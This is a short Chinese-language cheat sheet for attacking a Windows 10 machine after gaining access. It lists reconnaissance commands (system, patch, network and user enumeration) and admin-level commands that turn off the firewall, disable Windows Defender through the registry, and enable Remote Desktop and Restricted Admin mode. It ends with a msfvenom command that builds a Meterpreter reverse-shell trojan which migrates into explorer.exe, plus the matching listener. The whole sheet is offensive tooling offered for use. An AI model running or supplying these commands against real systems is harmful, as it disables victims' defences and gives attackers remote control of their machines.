guest < user < administrator < system
以下均已Win10为例
信息收集
systeminfo | findstr OS # 获取系统版本信息
systeminfo | findstr /C:"Hotfix(s):" /C:"KB" # 获取已安装的补丁信息
wmic product get name,version # 获取已安装的软件和版本号
wmic nic where PhysicalAdapter=True get MACAddress,Name # 获取MAC地址和网卡名
wmic NICCONFIG WHERE IPEnabled=true GET IPAddress # 获取ip地址
hostname # 获取主机名称
whoami /all # 获取当前用户的详细信息
whoami /priv # 显示当前用户的安全特权
net start # 查看服务
netstat -ano | findstr 3389 # 获取rdp连接来源IP
dir c:\programdata\ # 分析安装杀软
wmic qfe get Caption,Description,HotFixID,InstalledOn # 列出已安装的补丁
REG query HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\WinStations\RDP-Tcp /v PortNumber # 获取远程端口
tasklist /svc | find "TermService" # 获取服务pid
netstat -ano | find "pid" # 获取远程端口
quser # 当前活跃账户
wmic os get osarchitecture # 查看操作系统位数
防火墙操作
管理员操作(system)
netsh advfirewall set allprofiles state off # 关闭防火墙
netsh advfirewall show allprofiles # 查看防火墙状态
杀毒软件
管理员操作(system)
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /d 1 /t REG_DWORD /f # 关闭Defender
gpupdate /force # 刷新组策略
远程桌面
管理员操作(system)
reg add "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /t REG_DWORD /v portnumber /d 3389 /f # 设置远程桌面端口
REG ADD "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 00000000 /f # 开启远程桌面
REG ADD HKLM\System\CurrentControlSet\Control\Lsa /v DisableRestrictedAdmin /t REG_DWORD /d 00000000 /f # 启用受限管理员模式
netstat -ano | find "3389" # 检查端口状态
反弹Shell
Kali生成木马
注意迁移进程
msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=IP lport=PORT prependmigrateprocess=explorer.exe prependmigrate=true -f exe > windows.exe
Msfconsole连接
handler -p windows/x64/meterpreter/reverse_tcp -H 0.0.0.0 -P PORT